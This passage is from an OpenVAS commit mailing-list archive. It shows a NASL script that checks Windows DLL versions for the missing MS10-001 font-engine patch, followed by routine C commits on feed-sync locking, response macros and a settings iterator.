useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901095); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2010-0018"); + script_bugtraq_id(37671); + script_name("Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270)"); + desc = " + Overview: This host has critical security update missing according to + Microsoft Bulletin MS10-001. + + Vulnerability Insight: + An integer overflow error in the LZCOMP decompressor within the Embeded + OpenType Font Engine (EOT) when decompressing malformed files and content + containing embedded fonts. + + Impact: + Successful exploitation could allow remote attackers to crash an affected + system or execute arbitrary code by tricking a user into visiting a specially + crafted web page. + + Impact Level: System + + Affected Software/OS: + Microsoft Windows 2000 Service Pack 4 and prior. + Microsoft Windows XP Service Pack 3 and prior. + Microsoft Windows 2003 Service Pack 2 and prior. + + Fix: + Run Windows Update and update the listed hotfixes or download and + update mentioned hotfixes in the advisory from the below link, + http://www.microsoft.com/technet/security/bulletin/ms10-001.mspx + + References: + http://www.vupen.com/english/advisories/2010/0095 + http://www.microsoft.com/technet/security/bulletin/ms10-001.mspx + + Risk factor: Critical"; + + script_description(desc); + script_summary("Check for the vulnerable DLL file version"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2010 SecPod"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); + +if(hotfix_check_sp(win2k:5, xp:4, win2003:3) <= 0){ + exit(0); +} + +# Check for MS10-001 Hotfix Missing 972270 +if(hotfix_missing(name:"972270") == 0){ + exit(0); +} + +sysPath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!sysPath){ + exit(0); +} + +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:sysPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:sysPath + "\Fontsub.dll"); + +sysVer = GetVer(file:file, share:share); +if(!sysVer){ + exit(0); +} + +# Windows 2K +if(hotfix_check_sp(win2k:5) > 0) +{ + # Grep for Fontsub.dll version < 5.0.2195.7348 + if(version_is_less(version:sysVer, test_version:"5.0.2195.7348")){ + security_hole(0); + } +} +# Windows XP +else if(hotfix_check_sp(xp:4) > 0) +{ + SP = get_kb_item("SMB/WinXP/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for Fontsub.dll < 5.1.2600.3634 + if(version_is_less(version:sysVer, test_version:"5.1.2600.3634")){ + security_hole(0); + } + exit(0); + } + else if("Service Pack 3" >< SP) + { + # Grep for Fontsub.dll < 5.1.2600.5888 + if(version_is_less(version:sysVer, test_version:"5.1.2600.5888")){ + security_hole(0); + } + exit(0); + } + security_hole(0); +} + +# Windows 2003 +else if(hotfix_check_sp(win2003:3) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for Fontsub.dll version < 5.2.3790.4530 + if(version_is_less(version:sysVer, test_version:"5.2.3790.4603")){ + security_hole(0); + } + exit(0); + } + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/secpod_ms10-001.nasl ___________________________________________________________________ Name: svn:keywords + Revision From scm-commit at wald.intevation.org Wed Jan 13 16:04:46 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 16:04:46 +0100 (CET) Subject: [Openvas-commits] r6400 - in trunk/openvas-plugins: . scripts Message-ID: <20100113150446.CAC0986607AB@pyrosoma.intevation.org> Author: ckuerste Date: 2010-01-13 16:04:44 +0100 (Wed, 13 Jan 2010) New Revision: 6400 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/gb_an_guestbook_detect.nasl Log: * scripts/gb_an_guestbook_detect.nasl: Fixed typo Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-13 14:42:20 UTC (rev 6399) +++ trunk/openvas-plugins/ChangeLog 2010-01-13 15:04:44 UTC (rev 6400) @@ -1,3 +1,8 @@ +2010-01-13 Christian Kuersteiner + + * scripts/gb_an_guestbook_detect.nasl: + Fixed typo + 2010-01-13 Chandrashekhar B * scripts/gb_f3site_mult_lfi_vuln.nasl, Modified: trunk/openvas-plugins/scripts/gb_an_guestbook_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_an_guestbook_detect.nasl 2010-01-13 14:42:20 UTC (rev 6399) +++ trunk/openvas-plugins/scripts/gb_an_guestbook_detect.nasl 2010-01-13 15:04:44 UTC (rev 6400) @@ -2,7 +2,7 @@ # OpenVAS Vulnerability Test # $Id: gb_an_guestbook_detect.nasl 3174 2009-06-30 10:58:24Z may $ # -# AN Gusetbook Version Detection +# AN Guestbook Version Detection # # Authors: # Nikita MR @@ -27,17 +27,16 @@ if(description) { script_id(800523); - script_version("Revision: 1.0 "); - script_name("AN Gusetbook Version Detection"); + script_version("Revision: 1.0-$Revision$"); + script_name("AN Guestbook Version Detection"); desc = " - - Overview: This script detects the installed version of AN Gusetbook and + Overview: This script detects the installed version of AN Guestbook and sets the result in KB. Risk factor: Informational"; script_description(desc); - script_summary("Sets the KB for the version of AN Gusetbook"); + script_summary("Sets the KB for the version of AN Guestbook"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2009 Intevation GmbH"); script_family("Service detection"); Property changes on: trunk/openvas-plugins/scripts/gb_an_guestbook_detect.nasl ___________________________________________________________________ Name: svn:keywords + Revision From scm-commit at wald.intevation.org Wed Jan 13 16:54:55 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 16:54:55 +0100 (CET) Subject: [Openvas-commits] r6401 - in trunk/openvas-administrator: . src Message-ID: <20100113155455.DE4AE86607D2@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 16:54:54 +0100 (Wed, 13 Jan 2010) New Revision: 6401 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/admin.c trunk/openvas-administrator/src/admin.h trunk/openvas-administrator/src/oap.c trunk/openvas-administrator/src/openvasad.c Log: Make the locking around the feed synchronization atomic. * src/admin.c (openvas_sync_feed): Add locking around the sync based on the script name. Collect all the cleanup code at the end of the function. (openvasad_create_lockfile, openvasad_remove_lockfile): Remove. (openvasad_currently_syncing): Remove. Now openvas_currently_syncing. (openvas_currently_syncing): New function from openvasad_currently_syncing. Update lock file name to match openvas_sync_feed. * src/admin.h: Update headers accordingly. * src/oap.c (oap_xml_handle_end_element): Adjust CLIENT_SYNC_FEED for new atomic openvas_sync_feed. * src/openvasad.c (main): Adjust sync_feed command for new atomic openvas_sync_feed. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 15:04:44 UTC (rev 6400) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 15:54:54 UTC (rev 6401) @@ -1,8 +1,28 @@ 2010-01-13 Matthew Mundell + Make the locking around the feed synchronization atomic. + + * src/admin.c (openvas_sync_feed): Add locking around the sync based on + the script name. Collect all the cleanup code at the end of the function. + (openvasad_create_lockfile, openvasad_remove_lockfile): Remove. + (openvasad_currently_syncing): Remove. Now openvas_currently_syncing. + (openvas_currently_syncing): New function from + openvasad_currently_syncing. Update lock file name to match + openvas_sync_feed. + + * src/admin.h: Update headers accordingly. + + * src/oap.c (oap_xml_handle_end_element): Adjust CLIENT_SYNC_FEED for new + atomic openvas_sync_feed. + + * src/openvasad.c (main): Adjust sync_feed command for new atomic + openvas_sync_feed. + +2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): In CLIENT_SYNC_FEED put the sync code in an else, otherwise when another sync is in progress it - runs a second sync and sends two respondses. + runs a second sync and sends two responses. 2010-01-13 Matthew Mundell Modified: trunk/openvas-administrator/src/admin.c =================================================================== --- trunk/openvas-administrator/src/admin.c 2010-01-13 15:04:44 UTC (rev 6400) +++ trunk/openvas-administrator/src/admin.c 2010-01-13 15:54:54 UTC (rev 6401) @@ -34,7 +34,11 @@ #include "admin.h" +/** @todo Either use assert or g_assert, instead of mixing them. */ + #include +#include +#include #include #include #include @@ -864,22 +868,58 @@ * * @param[in] sync_script The file name of the synchronization script. * - * @return TRUE if the synchronization has finished successfully, FALSE if not. + * @return 0 sync finished successfully, 1 sync already in progress, -1 error. */ -gboolean +int openvas_sync_feed (const gchar * sync_script) { - g_assert (sync_script); - + int fd, ret = 0; + gchar *lockfile_name, *lockfile_dirname; gchar *script_identification_string = NULL; + g_assert (sync_script); + if (!openvas_get_sync_script_identification (sync_script, &script_identification_string)) { g_warning ("No valid synchronization script supplied!"); - return FALSE; + return -1; } + /* Open the lock file. */ + + lockfile_name = g_build_filename (g_get_tmp_dir (), + "openvas-feed-sync", + sync_script, + NULL); + lockfile_dirname = g_path_get_dirname (lockfile_name); + if (g_mkdir_with_parents (lockfile_dirname, S_IRWXU)) + { + g_warning ("Failed to create lock dir '%s': %s", + lockfile_dirname, + strerror (errno)); + g_free (lockfile_name); + g_free (lockfile_dirname); + return -1; + } + g_free (lockfile_dirname); + + fd = open (lockfile_name, + O_RDWR | O_CREAT | O_EXCL, + S_IWUSR | S_IRUSR /* "-rw-------" */); + if (fd == -1) + { + if (errno == EEXIST) + return 1; + g_warning ("Failed to open lock file '%s': %s", + lockfile_name, + strerror (errno)); + g_free (lockfile_name); + return -1; + } + + /* Sync. */ + gchar *script_working_dir = g_path_get_dirname (sync_script); gchar ** argv = (gchar **) g_malloc (2 * sizeof (gchar *)); @@ -895,115 +935,64 @@ &script_out, &script_err, &script_exit, &error)) { g_warning ("Failed to execute %s: %s", sync_script, error->message); - - g_free (script_working_dir); - g_strfreev (argv); - g_free (script_out); - g_free (script_err); - g_free (error); - - return FALSE; + ret = -1; + goto exit; } if (script_exit != 0) { g_warning ("%s returned a non-zero exit code.", sync_script); - - g_free (script_working_dir); - g_strfreev (argv); - g_free (script_out); - g_free (script_err); - g_free (error); - - return FALSE; + ret = -1; } + exit: + g_free (script_working_dir); g_strfreev (argv); g_free (script_out); g_free (script_err); g_free (error); - return TRUE; -} + /* Close the lock file. */ -/** - * @brief Lock a sync script. - * - * Create a lockfile for synchronization script and store the name of the - * synchronization script. - * - * @param[in] sync_script The file name of the synchronization script. - * - * @return TRUE if the lockfile was written successfully, FALSE if not. - */ -gboolean -openvasad_create_lockfile (const gchar * sync_script) -{ - g_assert (sync_script); - - if (openvasad_currently_syncing ()) + if (close (fd)) { - return FALSE; + g_warning ("Failed to close lock file: %s", strerror (errno)); + return -1; } - gchar *lockfile_name = g_build_filename (g_get_tmp_dir (), - "openvasad-feed-sync.lock", - NULL); + /* Remove the lock file. */ - if (!g_file_set_contents (lockfile_name, sync_script, -1, NULL)) + if (unlink (lockfile_name)) { - g_warning ("Failed to write lockfile!"); - g_free (lockfile_name); - return FALSE; + g_warning ("Failed to remove lock file: %s", strerror (errno)); + return -1; } g_free (lockfile_name); - return TRUE; -} -/** - * @brief Remove a lockfile for synchronization. - * - * @return TRUE if the lockfile was removed successfully, FALSE if not. - */ -gboolean -openvasad_remove_lockfile () -{ - gchar *lockfile_name = g_build_filename (g_get_tmp_dir (), - "openvasad-feed-sync.lock", - NULL); - if (!g_file_test (lockfile_name, G_FILE_TEST_EXISTS)) - { - g_free (lockfile_name); - return TRUE; - } - - if (g_unlink (lockfile_name) == 0) - { - g_free (lockfile_name); - return TRUE; - } - - g_warning ("Failed to remove lockfile!"); - g_free (lockfile_name); - return FALSE; + return ret; } /** * @brief Determine if the administrator is synchronizing with a feed. * - * If a lockfile exists, then the administrator is synchronizing. + * @param[in] sync_script The file name of the synchronization script. * - * @return TRUE if the administrator is currently synchronizing with a feed, + * @return TRUE if the administrator is currently synchronizing with the feed, * FALSE if not. */ gboolean -openvasad_currently_syncing () +openvas_currently_syncing (const gchar * sync_script) { - gchar *lockfile_name = g_build_filename (g_get_tmp_dir (), - "openvasad-feed-sync.lock", - NULL); + gchar *lockfile_name; + + g_assert (sync_script); + + lockfile_name = g_build_filename (g_get_tmp_dir (), + "openvas-feed-sync", + sync_script, + NULL); if (g_file_test (lockfile_name, G_FILE_TEST_EXISTS)) { g_free (lockfile_name); Modified: trunk/openvas-administrator/src/admin.h =================================================================== --- trunk/openvas-administrator/src/admin.h 2010-01-13 15:04:44 UTC (rev 6400) +++ trunk/openvas-administrator/src/admin.h 2010-01-13 15:54:54 UTC (rev 6401) @@ -34,15 +34,12 @@ int openvas_admin_remove_user (const gchar *, const gchar *); gboolean openvas_admin_set_rules (const gchar *, const gchar *, const gchar *); -gboolean openvas_sync_feed (const gchar *); +int openvas_sync_feed (const gchar *); +gboolean openvas_currently_syncing (const gchar *); gboolean openvas_sync_script_perform_selftest (const gchar *, gchar **); gboolean openvas_get_sync_script_identification (const gchar *, gchar **); gboolean openvas_get_sync_script_description (const gchar *, gchar **); -gboolean openvasad_create_lockfile (const gchar *); -gboolean openvasad_remove_lockfile (); -gboolean openvasad_currently_syncing (); - GString *print_settings (GHashTable *); GString *print_users_xml (GSList *); GString *print_users_text (GSList *); Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 15:04:44 UTC (rev 6400) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 15:54:54 UTC (rev 6401) @@ -1066,7 +1066,7 @@ SEND_TO_CLIENT_OR_FAIL (""); SENDF_TO_CLIENT_OR_FAIL ("%s", ident[3]); SENDF_TO_CLIENT_OR_FAIL ("%s", feed_description); - if (openvasad_currently_syncing ()) + if (openvas_currently_syncing (sync_script)) { SEND_TO_CLIENT_OR_FAIL (""); } @@ -1092,32 +1092,28 @@ } case CLIENT_SYNC_FEED: + switch (openvas_sync_feed (sync_script)) { - if (openvasad_currently_syncing ()) - { - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - } - else - { - openvasad_create_lockfile (sync_script); - if (openvas_sync_feed (sync_script)) - { - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - set_client_state (CLIENT_AUTHENTIC); - } - else - SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); - openvasad_remove_lockfile (); - } - set_client_state (CLIENT_AUTHENTIC); - break; + case 0: + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + break; + case 1: + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + break; + default: + assert (0); + case -1: + SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); + break; } + set_client_state (CLIENT_AUTHENTIC); + break; case CLIENT_GET_SETTINGS: { Modified: trunk/openvas-administrator/src/openvasad.c =================================================================== --- trunk/openvas-administrator/src/openvasad.c 2010-01-13 15:04:44 UTC (rev 6400) +++ trunk/openvas-administrator/src/openvasad.c 2010-01-13 15:54:54 UTC (rev 6401) @@ -44,6 +44,7 @@ #include "oxpd.h" #include "tracef.h" +#include #include #include #include @@ -675,24 +676,23 @@ " synchronization."); exit (EXIT_FAILURE); } - if (openvasad_currently_syncing ()) + switch (openvas_sync_feed (sync_script)) { - g_warning ("Feed is already being synchronized, aborting"); - exit (EXIT_FAILURE); + case 0: + g_message ("The feed has been successfully synchronized."); + exit (EXIT_SUCCESS); + break; + case 1: + g_warning ("Feed is already being synchronized, aborting"); + exit (EXIT_FAILURE); + break; + default: + assert (0); + case -1: + g_warning ("Failed to execute synchronization script (%s)!", sync_script); + exit (EXIT_FAILURE); + break; } - openvasad_create_lockfile (sync_script); - if (!openvas_sync_feed (sync_script)) - { - g_warning ("Failed to execute synchronization script (%s)!", sync_script); - openvasad_remove_lockfile (); - exit (EXIT_FAILURE); - } - else - { - g_message ("The feed has been successfully synchronized."); - openvasad_remove_lockfile (); - exit (EXIT_SUCCESS); - } } else if (g_strcasecmp (command, "test_sync_script") == 0) { From scm-commit at wald.intevation.org Wed Jan 13 17:05:01 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 17:05:01 +0100 (CET) Subject: [Openvas-commits] r6402 - in trunk/openvas-administrator: . src Message-ID: <20100113160501.B104986607D2@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 17:05:01 +0100 (Wed, 13 Jan 2010) New Revision: 6402 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: * src/oap.c (oap_xml_handle_end_element): Indent CLIENT_DESCRIBE_FEED and CLIENT_GET_SETTINGS properly. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 15:54:54 UTC (rev 6401) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 16:05:01 UTC (rev 6402) @@ -1,5 +1,10 @@ 2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): Indent CLIENT_DESCRIBE_FEED + and CLIENT_GET_SETTINGS properly. + +2010-01-13 Matthew Mundell + Make the locking around the feed synchronization atomic. * src/admin.c (openvas_sync_feed): Add locking around the sync based on Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 15:54:54 UTC (rev 6401) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 16:05:01 UTC (rev 6402) @@ -1051,45 +1051,45 @@ break; case CLIENT_DESCRIBE_FEED: - { - gchar *feed_description = NULL; - gchar *feed_identification = NULL; - if (openvas_get_sync_script_description (sync_script, - &feed_description) && - openvas_get_sync_script_identification (sync_script, - &feed_identification)) - { - gchar **ident = g_strsplit (feed_identification, "|", 6); - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - SENDF_TO_CLIENT_OR_FAIL ("%s", ident[3]); - SENDF_TO_CLIENT_OR_FAIL ("%s", feed_description); - if (openvas_currently_syncing (sync_script)) - { - SEND_TO_CLIENT_OR_FAIL (""); - } - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - g_strfreev (ident); - g_free (feed_description); - g_free (feed_identification); - } - else - { - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); - } - set_client_state (CLIENT_AUTHENTIC); - break; - } + { + gchar *feed_description = NULL; + gchar *feed_identification = NULL; + if (openvas_get_sync_script_description (sync_script, + &feed_description) && + openvas_get_sync_script_identification (sync_script, + &feed_identification)) + { + gchar **ident = g_strsplit (feed_identification, "|", 6); + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + SENDF_TO_CLIENT_OR_FAIL ("%s", ident[3]); + SENDF_TO_CLIENT_OR_FAIL ("%s", feed_description); + if (openvas_currently_syncing (sync_script)) + { + SEND_TO_CLIENT_OR_FAIL (""); + } + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + g_strfreev (ident); + g_free (feed_description); + g_free (feed_identification); + } + else + { + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (""); + } + set_client_state (CLIENT_AUTHENTIC); + break; + } case CLIENT_SYNC_FEED: switch (openvas_sync_feed (sync_script)) @@ -1116,31 +1116,31 @@ break; case CLIENT_GET_SETTINGS: - { - GHashTable *scanner_settings_hash_table = get_all_settings - (scanner_config_file, "Misc"); + { + GHashTable *scanner_settings_hash_table = get_all_settings + (scanner_config_file, "Misc"); - if (scanner_settings_hash_table != NULL) - { - GString *scanner_settings = g_string_new (""); - g_hash_table_foreach (scanner_settings_hash_table, - build_settings_xml, scanner_settings); - SENDF_TO_CLIENT_OR_FAIL ("" - "", - scanner_config_file); - SEND_TO_CLIENT_OR_FAIL (scanner_settings->str); - SEND_TO_CLIENT_OR_FAIL ("" - ""); - g_string_free (scanner_settings, TRUE); - g_hash_table_destroy (scanner_settings_hash_table); - } - else - SENDF_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_settings")); - set_client_state (CLIENT_AUTHENTIC); - break; - } + if (scanner_settings_hash_table != NULL) + { + GString *scanner_settings = g_string_new (""); + g_hash_table_foreach (scanner_settings_hash_table, + build_settings_xml, scanner_settings); + SENDF_TO_CLIENT_OR_FAIL ("" + "", + scanner_config_file); + SEND_TO_CLIENT_OR_FAIL (scanner_settings->str); + SEND_TO_CLIENT_OR_FAIL ("" + ""); + g_string_free (scanner_settings, TRUE); + g_hash_table_destroy (scanner_settings_hash_table); + } + else + SENDF_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_settings")); + set_client_state (CLIENT_AUTHENTIC); + break; + } case CLIENT_CREATE_USER: { From scm-commit at wald.intevation.org Wed Jan 13 17:24:27 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 17:24:27 +0100 (CET) Subject: [Openvas-commits] r6403 - in trunk/openvas-administrator: . src Message-ID: <20100113162427.2FE6686607D2@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 17:24:25 +0100 (Wed, 13 Jan 2010) New Revision: 6403 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: * src/oap.c (XML_ERROR_BUSY): New macro. (oap_xml_handle_end_element): In CLIENT_SYNC_FEED use response macros. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 16:05:01 UTC (rev 6402) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 16:24:25 UTC (rev 6403) @@ -1,5 +1,10 @@ 2010-01-13 Matthew Mundell + * src/oap.c (XML_ERROR_BUSY): New macro. + (oap_xml_handle_end_element): In CLIENT_SYNC_FEED use response macros. + +2010-01-13 Matthew Mundell + * src/oap.c (oap_xml_handle_end_element): Indent CLIENT_DESCRIBE_FEED and CLIENT_GET_SETTINGS properly. Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 16:05:01 UTC (rev 6402) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 16:24:25 UTC (rev 6403) @@ -543,6 +543,16 @@ " status_text=\"" STATUS_ERROR_MISSING_TEXT "\"/>" /** + * @brief Expand to XML for a STATUS_ERROR_BUSY response. + * + * @param tag Name of the command generating the response. + */ +#define XML_ERROR_BUSY(tag) \ + "<" tag "_response" \ + " status=\"" STATUS_ERROR_BUSY "\"" \ + " status_text=\"" STATUS_ERROR_BUSY_TEXT "\"/>" + +/** * @brief Expand to XML for a STATUS_ERROR_AUTH_FAILED response. * * @param tag Name of the command generating the response. @@ -1095,16 +1105,10 @@ switch (openvas_sync_feed (sync_script)) { case 0: - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (XML_OK ("sync_feed")); break; case 1: - SEND_TO_CLIENT_OR_FAIL (""); - SEND_TO_CLIENT_OR_FAIL (""); + SEND_TO_CLIENT_OR_FAIL (XML_ERROR_BUSY ("sync_feed")); break; default: assert (0); From scm-commit at wald.intevation.org Wed Jan 13 18:44:20 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 18:44:20 +0100 (CET) Subject: [Openvas-commits] r6404 - in trunk/openvas-libraries: . base Message-ID: <20100113174420.9194686607D2@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 18:44:20 +0100 (Wed, 13 Jan 2010) New Revision: 6404 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/base/settings.c trunk/openvas-libraries/base/settings.h Log: Switch to using GKeyFile to represent settings. In the process hide this underlying type from the settings user. * base/settings.c (get_all_settings): Remove. (init_settings_iterator, cleanup_settings_iterator) (settings_iterator_next, settings_iterator_name) (settings_iterator_value): New functions. * base/settings.h: Update headers accordingly. Make header check symbol more unique. (settings_iterator_t): New type. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-13 16:24:25 UTC (rev 6403) +++ trunk/openvas-libraries/ChangeLog 2010-01-13 17:44:20 UTC (rev 6404) @@ -1,3 +1,17 @@ +2010-01-13 Matthew Mundell + + Switch to using GKeyFile to represent settings. In the process hide + this underlying type from the settings user. + + * base/settings.c (get_all_settings): Remove. + (init_settings_iterator, cleanup_settings_iterator) + (settings_iterator_next, settings_iterator_name) + (settings_iterator_value): New functions. + + * base/settings.h: Update headers accordingly. Make header check + symbol more unique. + (settings_iterator_t): New type. + 2010-01-11 Michael Wiegand Post-release version bump. Modified: trunk/openvas-libraries/base/settings.c =================================================================== --- trunk/openvas-libraries/base/settings.c 2010-01-13 16:24:25 UTC (rev 6403) +++ trunk/openvas-libraries/base/settings.c 2010-01-13 17:44:20 UTC (rev 6404) @@ -37,42 +37,41 @@ #include "settings.h" /** - * @brief Returns a HashTable of setting retrieved from a given group of - * an configuration file. + * @brief Initialise a settings iterator. * - * @param filename The complete name of the configuration file. - * @param group The name of the group. + * @param[in] iterator Settings iterator. + * @param[in] filename Complete name of the configuration file. + * @param[in] group Name of the group in the file. * - * @return A pointer to a GHashTable containing key/value pairs of all - * settings found in the group or NULL if the file contents could not be - * accessed. The HashTable should be freed with g_hash_table_destroy() when no - * longer needed. + * @return 0 success, -1 error. */ -GHashTable * -get_all_settings (const gchar * filename, const gchar * group) +int +init_settings_iterator (settings_iterator_t *settings, const char *filename, + const char *group) { - g_assert (filename); - g_assert (group); - - GKeyFile* settingskeyfile = g_key_file_new (); GError* error = NULL; - gchar** keys = NULL; - GHashTable* settings = NULL; - int i; + gsize keys_length; - if (! g_key_file_load_from_file (settingskeyfile, filename, - G_KEY_FILE_NONE, &error)) + if (filename == NULL || group == NULL) + return -1; + + settings->key_file = g_key_file_new (); + + if (!g_key_file_load_from_file (settings->key_file, filename, G_KEY_FILE_NONE, + &error)) { - g_warning ("Failed to load configuration from %s: %s", filename, + g_warning ("Failed to load configuration from %s: %s", + filename, error->message); - g_key_file_free (settingskeyfile); g_error_free (error); - return NULL; + g_key_file_free (settings->key_file); + return -1; } - keys = g_key_file_get_keys (settingskeyfile, group, NULL, &error); + settings->keys = g_key_file_get_keys (settings->key_file, group, &keys_length, + &error); - if (keys == NULL) + if (settings->keys == NULL) { if (error) { @@ -80,24 +79,71 @@ filename, error->message); g_error_free (error); } - g_key_file_free (settingskeyfile); - return NULL; + g_key_file_free (settings->key_file); + return -1; } - settings = g_hash_table_new_full (g_str_hash, g_str_equal, - g_free, g_free); + settings->current_key = settings->keys - 1; + settings->last_key = settings->keys + keys_length - 1; + settings->group_name = g_strdup (group); - for (i = 0; i < g_strv_length (keys); i++) - { - gchar* value = g_key_file_get_value (settingskeyfile, group, - keys[i], &error); - g_hash_table_insert (settings, g_strdup (keys[i]), g_strdup (value)); - g_free (value); - } + return 0; +} - g_strfreev (keys); - g_key_file_free (settingskeyfile); +/** + * @brief Cleanup a settings iterator. + * + * @param[in] iterator Settings iterator. + */ +void +cleanup_settings_iterator (settings_iterator_t *settings) +{ + g_free (settings->group_name); + g_strfreev (settings->keys); + g_key_file_free (settings->key_file); +} - return settings; +/** + * @brief Increment an iterator. + * + * @param[in] iterator Settings iterator. + * + * @return TRUE if there was a next item, else FALSE. + */ +gboolean +settings_iterator_next (settings_iterator_t *settings) +{ + if (settings->current_key == settings->last_key) + return FALSE; + settings->current_key++; + return TRUE; } +/** + * @brief Get the name from a settings iterator. + * + * @param[in] iterator Settings iterator. + * + * @return Name of current key. + */ +const gchar * +settings_iterator_name (settings_iterator_t *settings) +{ + return *settings->current_key; +} + +/** + * @brief Get the value from a settings iterator. + * + * @param[in] iterator Settings iterator. + * + * @return Value of current key. + */ +const gchar * +settings_iterator_value (settings_iterator_t *settings) +{ + return g_key_file_get_value (settings->key_file, + settings->group_name, + *settings->current_key, + NULL); +} Modified: trunk/openvas-libraries/base/settings.h =================================================================== --- trunk/openvas-libraries/base/settings.h 2010-01-13 16:24:25 UTC (rev 6403) +++ trunk/openvas-libraries/base/settings.h 2010-01-13 17:44:20 UTC (rev 6404) @@ -30,12 +30,33 @@ * This file contains the protos for \ref settings.c */ -#ifndef _SETTINGS_H -#define _SETTINGS_H +#ifndef _OPENVAS_LIBRARIES_BASE_SETTINGS_H +#define _OPENVAS_LIBRARIES_BASE_SETTINGS_H #include -GHashTable * -get_all_settings (const gchar *, const gchar *); +typedef struct +{ + gchar *group_name; + GKeyFile *key_file; + gchar **keys; + gchar **current_key; + gchar **last_key; +} settings_iterator_t; -#endif /* not _SETTINGS_H */ +int +init_settings_iterator (settings_iterator_t *, const char *, const char *); + +void +cleanup_settings_iterator (settings_iterator_t *); + +int +settings_iterator_next (settings_iterator_t *); + +const gchar * +settings_iterator_name (settings_iterator_t *); + +const gchar * +settings_iterator_value (settings_iterator_t *); + +#endif /* not _OPENVAS_LIBRARIES_BASE_SETTINGS_H */ From scm-commit at wald.intevation.org Wed Jan 13 18:49:26 2010 From: scm-commit at 